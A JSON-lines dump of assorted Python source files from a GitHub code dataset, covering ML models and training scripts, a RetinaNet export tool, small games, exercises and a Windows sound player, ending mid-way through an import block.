indent = 4, sort_keys=True)\n\nif __name__ == '__main__':\n\t# load data\n\tdf = pd.read_csv('data/transfusion.data')\n\txDf = df.loc[:, df.columns != 'Donated']\n\ty = df['Donated']\n\t# get random numbers to split into train and test\n\tnp.random.seed(1)\n\tr = np.random.rand(len(df))\n\t# split into train test\n\tX_train = xDf[r < 0.8]\n\tX_test = xDf[r >= 0.8]\n\ty_train = y[r < 0.8]\n\ty_test = y[r >= 0.8]\n\tapp.run(debug=True)\n","repo_name":"liangvi-cs5500/liangvi-cs5500.github.io","sub_path":"files/visualizing_client_server/flask_roc.py","file_name":"flask_roc.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73177628648","text":"n=int(input())\narray=[]\nfor _ in range(n):\n temp=input().split(' ')\n temp1=[]\n for i in temp:\n temp1.append(int(i))\n 
array.append(temp1)\ncount=0\nfor i in array:\n s=sum(i)\n if s>=2:\n count+=1\nprint(count)","repo_name":"fali007/competetive-coding","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1656748178","text":"import numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom collections import OrderedDict\n\ndef get_model(name, n_classes, n_time, embedding_dim=128, n_layer=32, channels=1):\n if name == \"resnet\":\n return ResNet(n_classes, n_time, embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer)\n elif name == \"resnet_256\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,1), (2,1), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_512\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,1), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_1024\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_2048\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_4096\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_8192\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_16384\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_big\":\n return ResNet(n_classes, n_time, n_layer1=64, n_layer2=128, n_layer3=256)\n else:\n raise ValueError(\"model with name {} not defined ... 
\")\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, drop_rate=0.0, drop_block=False, block_size=1):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.LeakyReLU(0.1)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = conv3x3(planes, planes)\n self.bn3 = nn.BatchNorm2d(planes)\n self.maxpool = nn.MaxPool2d(stride)\n self.downsample = downsample\n self.stride = stride\n self.drop_rate = drop_rate\n self.num_batches_tracked = 0\n self.drop_block = drop_block\n self.block_size = block_size\n \n\n def forward(self, x):\n self.num_batches_tracked += 1\n\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n out = self.maxpool(out)\n out = F.dropout(out, p=self.drop_rate, training=self.training, inplace=True)\n \n \n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, n_classes, n_time, block=BasicBlock, keep_prob=1.0, avg_pool=True, drop_rate=0.1, dropblock_size=5, embedding_dim=128, n_layer1 = 32, n_layer2 = 32, n_layer3 = 32, n_layer4 = 32, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], channels=1):\n self.inplanes = channels\n super(ResNet, self).__init__()\n # settings\n pooling_size = (4,2)\n\n self.layer1 = self._make_layer(block, n_layer1, stride=downpool_strides[0], drop_rate=drop_rate)\n self.layer2 = self._make_layer(block, n_layer2, stride=downpool_strides[1], drop_rate=drop_rate)\n self.layer3 = self._make_layer(block, n_layer3, stride=downpool_strides[2], drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)\n self.layer4 = self._make_layer(block, n_layer4, stride=downpool_strides[3], drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)\n\n if avg_pool:\n self.avgpool = nn.AvgPool2d(5, stride=1)\n self.keep_prob = keep_prob\n self.keep_avg_pool = avg_pool\n self.dropout = nn.Dropout(p=1 - self.keep_prob, inplace=False)\n self.drop_rate = drop_rate\n self.pool = nn.AdaptiveAvgPool2d(pooling_size)\n\n self.fc1 = nn.Linear(np.prod(pooling_size)*n_layer4, embedding_dim)\n\n self.dropout = nn.Dropout(0.3)\n self.fc2 = nn.Linear(embedding_dim, n_classes*n_time)\n\n self.n_classes = n_classes\n self.n_time = n_time\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='leaky_relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, stride=1, drop_rate=0.0, drop_block=False, block_size=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=1, bias=False),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, drop_rate, drop_block, block_size))\n self.inplanes = planes * block.expansion\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = 
self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n \n x = self.pool(x)\n\n # flatten\n x = x.view(x.size(0), -1)\n\n x = self.fc1(x)\n x_rep = F.relu(x)\n x = self.dropout(x_rep)\n x = self.fc2(x)\n\n y_pred = x.view((-1, self.n_classes, self.n_time))\n\n return y_pred, x_rep\n","repo_name":"johnmartinsson/few-shot-learning-bioacoustics","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11175256688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport collections\nimport numpy as np\n\nimport tadpole.util as util\nimport tadpole.autodiff as ad\nimport tadpole.array as ar\nimport tadpole.tensor as tn\nimport tadpole.index as tid\n\nimport tadpole.tensor.engine as tne \n\nimport tests.tensor.fakes as fake\nimport tests.tensor.data as data\n\n\nfrom tadpole.tensor.types import (\n Pluggable,\n Tensor, \n Space,\n)\n\n\nfrom tadpole.index import (\n Index,\n IndexGen, \n Indices,\n)\n\n\n\n\n# --- Train data ---------------------------------------------------------- #\n\nTrainData = collections.namedtuple(\"TrainData\", [\n \"train\", \n \"tensors\", \"arrays\", \"datas\", \"inds\",\n \"indnames\", \"shapes\", \"backend\", \"opts\",\n ])\n\n\n\n\ndef train_dat(backend, indnames, shapes, **opts):\n\n ws = []\n for i in range(len(shapes)):\n\n w = data.tensor_dat(data.randn)(\n backend, indnames[i], shapes[i], seed=i+1, **opts\n )\n ws.append(w)\n\n tensors = [w.tensor for w in ws]\n arrays = [w.array for w in ws]\n datas = [w.data for w in ws]\n inds = [w.inds for w in ws]\n\n arrays = util.Sequence(arrays)\n inds = util.Sequence(inds)\n train = tne.TrainTensorData(arrays, inds)\n\n return TrainData(\n train, \n tensors, arrays, datas, inds, \n indnames, shapes, ws[0].backend, opts\n ) \n\n\n\n\n","repo_name":"dkilda/tadpole","sub_path":"tests/tensor/data/engines.py","file_name":"engines.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5545465978","text":"# ==================================================================\r\n# Clean run of sb3 rl algo on gym env\r\n# ==================================================================\r\nimport gym\r\nfrom stable_baselines3 import PPO, SAC\r\nimport torch\r\nfrom pathlib import Path\r\nfrom stable_baselines3 import PPO, SAC\r\nfrom stable_baselines3.common.vec_env import SubprocVecEnv\r\nfrom stable_baselines3.common.callbacks import CallbackList, EveryNTimesteps\r\n\r\nimport argparse\r\nimport json\r\nimport os\r\nimport sys\r\nimport numpy as np\r\n\r\nimport wandb\r\n\r\nmaster_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\r\nsys.path.insert(1, master_dir)\r\n\r\nfrom src.sb3_extentions.custom_cnn import CustomCnn\r\n\r\nfrom src.sb3_extentions.callbacks import SACWandbCallback\r\n\r\ndef run(args):\r\n\r\n if args.env_seed == -1:\r\n args.env_seed = None\r\n\r\n args.upsample = 1\r\n arg_dict = vars(args)\r\n\r\n if args.wandb:\r\n wandb_args = {'project': args.wandb}\r\n if args.wandb_group:\r\n wandb_args['group'] = args.wandb_group \r\n if args.wandb_name:\r\n wandb_args['name'] = args.wandb_name\r\n wandb_args['config'] = arg_dict\r\n wandb.init(**wandb_args)\r\n \r\n if args.log_dir:\r\n Path(args.log_dir).mkdir(parents=True, exist_ok=True)\r\n with open(os.path.join(args.log_dir, \"args.json\"), 'wt') as f:\r\n 
json.dump(arg_dict, f, indent=4)\r\n        print(\"args:\\n\", arg_dict)\r\n    args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")  # Add device to args so it can propagate to RP\r\n\r\n    env = gym.make(args.env_name)\r\n    env.seed(args.env_seed)\r\n    print(env)\r\n\r\n    if args.algo_name == 'PPO':\r\n        policy_kwargs = dict(features_extractor_class=CustomCnn)\r\n        model = PPO('CnnPolicy', env, policy_kwargs=policy_kwargs, verbose=1, n_steps=args.n_steps,\r\n                    tensorboard_log=args.log_dir)\r\n\r\n    elif args.algo_name == 'SAC':\r\n        model = SAC('MlpPolicy', env, verbose=2,\r\n                    tensorboard_log=args.log_dir)\r\n\r\n    if args.wandb:\r\n        # overload sb3 logger to use wandb\r\n        from stable_baselines3.common import logger\r\n        orig_record = logger.record\r\n        def wandb_record(*args, **kwargs):\r\n            if 'timesteps' in args[0]:\r\n                wandb_record.step = args[1]\r\n            if 'train' not in args[0]:\r\n                wandb.log({args[0]: args[1]})\r\n            orig_record(*args, **kwargs)\r\n\r\n        wandb_record.step = 0\r\n        logger.record = wandb_record\r\n\r\n        callback = SACWandbCallback(args.wandb)\r\n    else:\r\n        callback = None  # no W&B project given: train without the logging callback\r\n\r\n    # Learn model\r\n    model.learn(total_timesteps=args.total_timesteps, callback=callback)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('--env_name', required=True, type=str)\r\n    parser.add_argument('--algo_name', required=True, type=str)\r\n\r\n    parser.add_argument('--run_name', required=True, type=str)\r\n    parser.add_argument('--data_size', default=0, type=int)\r\n    parser.add_argument('--total_timesteps', default=1000000, type=int)\r\n    parser.add_argument('--env_seed', default=-1, type=int)\r\n    parser.add_argument('--env_size', default=15, type=int)\r\n    parser.add_argument('--n_envs', default=2, type=int)\r\n    parser.add_argument('--n_steps', default=2048, type=int)\r\n    parser.add_argument('--log_dir', default=None, type=str)\r\n    parser.add_argument('--show_trajectory', default=False, action='store_true')\r\n    parser.add_argument('--render', default=False, action='store_true')\r\n\r\n    parser.add_argument('--reward_pred', default=None, type=str, help='Path to a directory containing only RP models')\r\n    parser.add_argument('--rp_factor', default=1, type=float, help='multiply factor for predicted reward')\r\n    parser.add_argument('--dijk_lambda', default=1, type=float, help='multiply factor for dijk reward')\r\n    parser.add_argument('--far_from_goal', default=False, help='make agent as far from goal as possible', action='store_true')\r\n\r\n    parser.add_argument('--n_data', default=10, type=int)\r\n    # wandb\r\n    parser.add_argument('--wandb', default=None, type=str, help='project name for W&B. 
Default: Wandb not active')\r\n parser.add_argument('--wandb_group', default=None, type=str, help='group name for W&B')\r\n parser.add_argument('--wandb_name', default=None, type=str, help='run name for W&B')\r\n\r\n parsed_args = parser.parse_args()\r\n run(parsed_args)\r\n","repo_name":"Ugadot/RL_with_trajectory_feedback","sub_path":"scripts/test_rl.py","file_name":"test_rl.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20614913121","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport logging\nimport os\nimport struct\nimport tempfile\nimport graphsurgeon as gs\n\nimport keras.backend as K\nfrom keras.layers import Permute, Reshape\nfrom keras.models import Model\nimport tensorflow as tf\nimport uff\n\n# Import quantization layer processing.\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\nfrom nvidia_tao_tf1.core.export._uff import keras_to_pb\nfrom nvidia_tao_tf1.cv.common.export.keras_exporter import KerasExporter as Exporter\nfrom nvidia_tao_tf1.cv.retinanet.initializers.prior_prob import PriorProbability\nfrom nvidia_tao_tf1.cv.retinanet.layers.anchor_box_layer import RetinaAnchorBoxes\n\nfrom nvidia_tao_tf1.cv.retinanet.utils.model_io import load_model\nfrom nvidia_tao_tf1.cv.retinanet.utils.spec_loader import load_experiment_spec\n\nNUM_FEATURE_MAPS = 5\nlogger = logging.getLogger(__name__)\n\n\nclass RetinaNetExporter(Exporter):\n \"\"\"Exporter class to export a trained RetinaNet model.\"\"\"\n\n def __init__(self, model_path=None,\n key=None,\n data_type=\"fp32\",\n strict_type=False,\n experiment_spec_path=\"\",\n backend=\"uff\",\n **kwargs):\n \"\"\"Instantiate the RetinaNet exporter to export etlt model.\n\n Args:\n model_path(str): Path to the RetinaNet model file.\n key (str): Key to decode the model.\n data_type (str): Backend data-type for the optimized TensorRT engine.\n strict_type(bool): Apply TensorRT strict_type_constraints or not for INT8 mode.\n experiment_spec_path (str): Path to RetinaNet experiment spec file.\n backend (str): Type of intermediate backend parser to be instantiated.\n \"\"\"\n super(RetinaNetExporter, self).__init__(model_path=model_path,\n key=key,\n data_type=data_type,\n strict_type=strict_type,\n backend=backend)\n self.experiment_spec_path = experiment_spec_path\n assert os.path.isfile(self.experiment_spec_path), \\\n \"Experiment spec file not found at {}.\".format(self.experiment_spec_path)\n self.experiment_spec = load_experiment_spec(self.experiment_spec_path)\n self.custom_objects = {'RetinaAnchorBoxes': RetinaAnchorBoxes,\n 'PriorProbability': PriorProbability}\n self.tlt2 = False\n self.num_classes = len({str(x) for x in\n self.experiment_spec.dataset_config.target_class_mapping.values()})\n\n def load_model(self, backend=\"uff\"):\n \"\"\"Simple function to load the RetinaNet Keras model.\"\"\"\n experiment_spec = self.experiment_spec\n K.clear_session()\n K.set_learning_phase(0)\n model = load_model(self.model_path, experiment_spec, key=self.key)\n if model.get_layer('mbox_conf').output.shape[3] == self.num_classes:\n self.tlt2 = True\n outputs = self.generate_trt_output(model.get_layer('mbox_loc').output,\n model.get_layer('mbox_conf').output,\n model.get_layer('mbox_priorbox').output)\n model = Model(inputs=model.inputs, outputs=outputs)\n\n if 
check_for_quantized_layers(model):\n model, self.tensor_scale_dict = process_quantized_layers(\n model, backend,\n calib_cache=None,\n calib_json=None)\n\n # plugin nodes will have different names in TRT\n nodes = list(self.tensor_scale_dict.keys())\n for k in nodes:\n if k.find('upsample') != -1:\n node_name_in_trt = k.split('/')[0]\n self.tensor_scale_dict[node_name_in_trt] = self.tensor_scale_dict.pop(k)\n\n # ZeroPadding is fused with its following conv2d/depthwiseconv2d, collapse them.\n padding_nodes = []\n for k in self.tensor_scale_dict:\n if '/Pad' in k:\n # this is a ZeroPadding node\n padding_nodes.append(k)\n for n in padding_nodes:\n self.tensor_scale_dict.pop(n)\n\n img_mean = experiment_spec.augmentation_config.image_mean\n self.image_mean = [103.939, 116.779, 123.68] \\\n if experiment_spec.augmentation_config.output_channel == 3 else [117.3786]\n if img_mean:\n if experiment_spec.augmentation_config.output_channel == 3:\n self.image_mean = [img_mean['b'], img_mean['g'], img_mean['r']]\n else:\n self.image_mean = [img_mean['l']]\n return model\n\n def _calibration_cache_from_dict(self, tensor_scale_dict,\n calibration_cache=None,\n calib_json=None):\n \"\"\"Write calibration cache file for QAT model.\n\n This function converts a tensor scale dictionary generated by processing\n QAT models to TRT readable format. By default we set it as a\n trt.IInt8.EntropyCalibrator2 cache file.\n\n Args:\n tensor_scale_dict (dict): The dictionary of parameters: scale_value file.\n calibration_cache (str): Path to output calibration cache file.\n\n Returns:\n No explicit returns.\n \"\"\"\n if calibration_cache is not None:\n cal_cache_str = \"TRT-{}-EntropyCalibration2\\n\".format(self._trt_version_number)\n assert not os.path.exists(calibration_cache), (\n \"A pre-existing cache file exists. 
Please delete this \"\n \"file and re-run export.\"\n )\n # Converting float numbers to hex representation.\n for tensor in tensor_scale_dict:\n if tensor in [\"P4_upsampled\", \"P5_upsampled\"]:\n continue\n scaling_factor = tensor_scale_dict[tensor] / 127.0\n cal_scale = hex(struct.unpack(\"i\", struct.pack(\"f\", scaling_factor))[0])\n assert cal_scale.startswith(\n \"0x\"), \"Hex number expected to start with 0x.\"\n cal_scale = cal_scale[2:]\n cal_cache_str += tensor + \": \" + cal_scale + \"\\n\"\n with open(calibration_cache, \"w\") as f:\n f.write(cal_cache_str)\n\n if calib_json is not None:\n calib_json_data = {\"tensor_scales\": {}}\n for tensor in tensor_scale_dict:\n calib_json_data[\"tensor_scales\"][tensor] = float(\n tensor_scale_dict[tensor])\n with open(calib_json, \"w\") as outfile:\n json.dump(calib_json_data, outfile, indent=4)\n\n def generate_trt_output(self, loc, conf, anchor):\n \"\"\"Manipulate model outputs so we can use TRT NMS plugin.\"\"\"\n\n out_loc = Reshape((-1, 1, 1), name='loc_data')(loc)\n out_conf = Reshape((-1, 1, 1), name='conf_data')(conf)\n out_anchor = Reshape((-1, 2, 4), name=\"anchor_reshape\")(anchor)\n out_anchor = Permute((2, 1, 3), name=\"anchor_permute\")(out_anchor)\n out_anchor = Reshape((2, -1, 1), name='anchor_data')(out_anchor)\n return [out_loc, out_conf, out_anchor]\n\n def save_exported_file(self, model, output_file_name):\n \"\"\"Save the exported model file.\n\n This routine converts a keras model to onnx/uff model\n based on the backend the exporter was initialized with.\n\n Args:\n model (keras.model.Model): Decoded keras model to be exported.\n output_file_name (str): Path to the output file.\n\n Returns:\n tmp_uff_file (str): Path to the temporary uff file.\n \"\"\"\n os_handle, tmp_pb_file = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n\n if self.backend == \"uff\":\n keras_to_pb(model, tmp_pb_file, None,\n custom_objects=self.custom_objects)\n tf.reset_default_graph()\n dynamic_graph = gs.DynamicGraph(tmp_pb_file)\n dynamic_graph = self.node_process(dynamic_graph)\n\n os.remove(tmp_pb_file)\n\n uff.from_tensorflow(dynamic_graph.as_graph_def(),\n self.output_node_names,\n output_filename=output_file_name,\n text=False,\n quiet=True)\n logger.info(\"Converted model was saved into %s\", output_file_name)\n return output_file_name\n raise NotImplementedError(\"Invalid backend provided. 
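`_calibration_cache_from_dict` above serializes each tensor scale as the raw bits of a float32, hex-encoded, one `tensor: hexvalue` line per entry. A tiny sketch of just that encoding step (illustrative helper name; positive scales assumed, since a negative float would break the `0x` prefix check used above):

```python
import struct

def scale_to_cache_hex(scale: float) -> str:
    # reinterpret the float32 bits as an int32, then hex-encode without the '0x'
    raw = struct.unpack("i", struct.pack("f", scale))[0]
    return hex(raw)[2:]

print(scale_to_cache_hex(1.0 / 127.0))  # -> '3c010204'
```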
{}\".format(self.backend))\n\n def set_input_output_node_names(self):\n \"\"\"Set input output node names.\"\"\"\n self.output_node_names = [\"NMS\"]\n self.input_node_names = [\"Input\"]\n\n def node_process(self, retinanet_graph):\n \"\"\"Manipulating the dynamic graph to make it compatible with TRT.\n\n Args:\n retinanet_graph (gs.DynamicGraph): Dynamic graph from the TF Proto file.\n\n Returns:\n retinanet_graph (gs.DymanicGraph): Post processed dynamic graph which is ready to be\n serialized as a uff file.\n \"\"\"\n spec = self.experiment_spec\n FirstDimTile = [\n gs.create_node(name=\"FirstDimTile_{}\".format(i), trt_plugin=True,\n op=\"BatchTilePlugin_TRT\")\n for i in range(NUM_FEATURE_MAPS)\n ]\n\n # TensorRT Bug 2603572, anchor_data/Reshape must be at the very beginning!\n if self.tlt2:\n background_id = -1\n num_classes = self.num_classes\n else:\n background_id = 0\n num_classes = self.num_classes + 1\n\n NMS = gs.create_plugin_node(name='NMS', op='NMS_TRT',\n inputs=['anchor_data/Reshape',\n 'loc_data/Reshape',\n 'conf_data/Reshape'],\n shareLocation=1,\n varianceEncodedInTarget=0,\n backgroundLabelId=background_id,\n confidenceThreshold=spec.nms_config.confidence_threshold,\n nmsThreshold=spec.nms_config.clustering_iou_threshold,\n topK=2*spec.nms_config.top_k, # topK as NMS input\n codeType=1,\n keepTopK=spec.nms_config.top_k, # NMS output topK\n numClasses=num_classes,\n inputOrder=[1, 2, 0],\n confSigmoid=1,\n isNormalized=1,\n scoreBits=spec.nms_config.infer_nms_score_bits)\n\n # Create a mapping of namespace names -> plugin nodes.\n namespace_plugin_map = {\"retinanet_anchor_{}/FirstDimTile\".format(i): FirstDimTile[i]\n for i in range(NUM_FEATURE_MAPS)}\n resizenearest_map = {'P4_upsampled': gs.create_plugin_node(name='P4_upsampled',\n op=\"ResizeNearest_TRT\",\n scale=2.0),\n 'P5_upsampled': gs.create_plugin_node(name='P5_upsampled',\n op=\"ResizeNearest_TRT\",\n scale=2.0)}\n namespace_plugin_map.update(dict(resizenearest_map))\n # Create a new graph by collapsing namespaces\n retinanet_graph.append(NMS)\n retinanet_graph.collapse_namespaces(namespace_plugin_map)\n return retinanet_graph\n\n def get_class_labels(self):\n \"\"\"Get list of class labels to serialize to a labels.txt file.\"\"\"\n classes = sorted({str(x) for x in\n self.experiment_spec.dataset_config.target_class_mapping.values()})\n # add background label at idx=0:\n classes = [\"background\"] + classes\n return classes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/retinanet/export/exporter.py","file_name":"exporter.py","file_ext":"py","file_size_in_byte":12399,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"42488075194","text":"import turtle\n\npencere = turtle.Screen()\ncanvas = pencere.getcanvas()\nroot = canvas.winfo_toplevel()\npencere.title('PyPong Game')\npencere.bgcolor('black')\npencere.setup(width=800, height=600)\npencere.tracer(0)\n\nracket_a = turtle.Turtle()\nracket_a.speed(0)\nracket_a.shape('square')\nracket_a.color('white')\nracket_a.penup()\nracket_a.goto(-350, 0)\nracket_a.shapesize(5, 1)\n\nracket_b = turtle.Turtle()\nracket_b.speed(0)\nracket_b.shape('square')\nracket_b.color('white')\nracket_b.penup()\nracket_b.goto(350, 0)\nracket_b.shapesize(5, 1)\n\nball = turtle.Turtle()\nball.speed(0)\nball.shape('circle')\nball.color('white')\nball.penup()\nball.dx = 0.15\nball.dy = 0.15\n\nskor = turtle.Turtle()\nskor.speed(0)\nskor.color('white')\nskor.penup()\nskor.goto(0, 
260)\nskor.write('Oyuncu A:0 Oyuncu B:0', align='center', font=('courier', 24, 'bold'))\nskor.hideturtle()\nskor_a = 0\nskor_b = 0\n\n\ndef racket_a_up():\n y = racket_a.ycor()\n y = y + 20\n racket_a.sety(y)\ndef racket_a_down():\n y = racket_a.ycor()\n y = y - 20\n racket_a.sety(y)\ndef racket_b_up():\n y = racket_b.ycor()\n y = y + 20\n racket_b.sety(y)\ndef racket_b_down():\n y = racket_b.ycor()\n y = y - 20\n racket_b.sety(y)\n\npencere.listen()\npencere.onkeypress(racket_a_up, \"w\")\npencere.onkeypress(racket_a_down, \"s\")\npencere.onkeypress(racket_b_up, \"Up\")\npencere.onkeypress(racket_b_down, \"Down\")\n\ndef winclose():\n global winbug\n winbug = False\nroot.protocol(\"WM_DELETE_WINDOW\", winclose)\nwinbug = True\n\nwhile winbug:\n pencere.update()\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n if ball.ycor()>290 or ball.ycor()<-290:\n ball.dy = ball.dy * -1\n\n if ball.xcor()>390:\n ball.goto(0, 0)\n ball.dx = ball.dx * -1\n skor_a = skor_a + 1\n skor.clear()\n skor.write(\"Oyuncu A:{} Oyuncu B:{}\".format(skor_a, skor_b), align='center', font=('courier', 24, 'bold'))\n if ball.xcor()<-390:\n ball.goto(0, 0)\n ball.dx = ball.dx * -1\n skor_b = skor_b + 1\n skor.clear()\n skor.write(\"Oyuncu A:{} Oyuncu B:{}\".format(skor_a, skor_b), align='center', font=('courier', 24, 'bold'))\n if(ball.xcor()>340 and ball.xcor()<350) and (ball.ycor()racket_b.ycor()-60):\n ball.setx(340)\n ball.dx = ball.dx * -1\n if(ball.xcor()<-340 and ball.xcor()>-350) and (ball.ycor()racket_a.ycor()-60):\n ball.setx(-340)\n ball.dx = ball.dx * -1\n","repo_name":"HzTewso/PyPong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20078669733","text":"import stdio\nimport sys\n\n# Get n(int) from command line.\nn = int(sys.argv[1])\n\nfor i in range(2, n + 1):\n # For each i from [2, n]...\n\n # Set total(sum of divisors of i) to 0\n total = 0\n\n for j in range(1, (i // 2) + 1):\n # For each j from [1, i/2],...\n if i % j == 0:\n # if i is divisible by j, increment total by j.\n total += j\n if total == i:\n # If total equals i, write i(the perfect number).\n stdio.writeln(i)\n","repo_name":"mouratony/CS110-Python","sub_path":"Programs with Control Flow/perfect_numbers.py","file_name":"perfect_numbers.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10726559202","text":"# coding: utf-8\n# Copied from a coding forum and was modified\n# Thank the origin author, although I cannot find the earliest person\n\n\nclass PlaysoundException(Exception):\n pass\n\n\ndef playsound(sound, block=True):\n \"\"\"\n Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on\n Windows 7 with Python 2.7. Probably works with more file formats.\n Probably works on Windows XP thru Windows 10. 
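For reference, the divisor-sum loop in the `perfect_numbers.py` record above can be cross-checked with a condensed version; the perfect numbers below 10,000 are exactly 6, 28, 496 and 8128:

```python
# condensed form of the divisor-sum loop above, for n = 10_000
perfect = [i for i in range(2, 10_001)
           if sum(j for j in range(1, i // 2 + 1) if i % j == 0) == i]
assert perfect == [6, 28, 496, 8128]
```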
Probably works with all\n versions of Python.\n\n Inspired by (but not copied from) Michael Gundlach 's mp3play:\n https://github.com/michaelgundlach/mp3play\n\n I never would have tried using windll.winmm without seeing his code.\n \"\"\"\n from ctypes import c_buffer, windll\n from random import random\n from time import sleep\n from sys import getfilesystemencoding\n\n def winCommand(*command):\n buf = c_buffer(255)\n command = ' '.join(command).encode(getfilesystemencoding())\n errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))\n if errorCode:\n errorBuffer = c_buffer(255)\n windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)\n try:\n exceptionMessage = ('\\n Error ' + str(errorCode) + ' for command:'\n '\\n ' + command.decode() +\n '\\n ' + errorBuffer.value.decode())\n except:\n exceptionMessage = ('\\n Error ' + str(errorCode) + ' for command:'\n '\\n ' + command.decode(\"gbk\") +\n '\\n ' + errorBuffer.value.decode(\"gbk\"))\n raise PlaysoundException(exceptionMessage)\n return buf.value\n\n alias = 'playsound_' + str(random())\n winCommand('open \"' + sound + '\" alias', alias)\n winCommand('set', alias, 'time format milliseconds')\n durationInMS = winCommand('status', alias, 'length')\n winCommand('play', alias, 'from 0 to', durationInMS.decode())\n\n if block:\n sleep(float(durationInMS) / 1000.0)\n winCommand('close', alias)\n\n\nif __name__ == '__main__':\n import sys\n\n playsound(sys.argv[1])\n","repo_name":"rainydew/verachess","sub_path":"src/music-player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"33595424770","text":"\nimport socket, time, sys, struct, os\nimport cv2, pickle, threading\nimport numpy as np\nfrom flask import request, url_for\nfrom flask_api import FlaskAPI, status, exceptions\nfrom os import listdir\nfrom os.path import 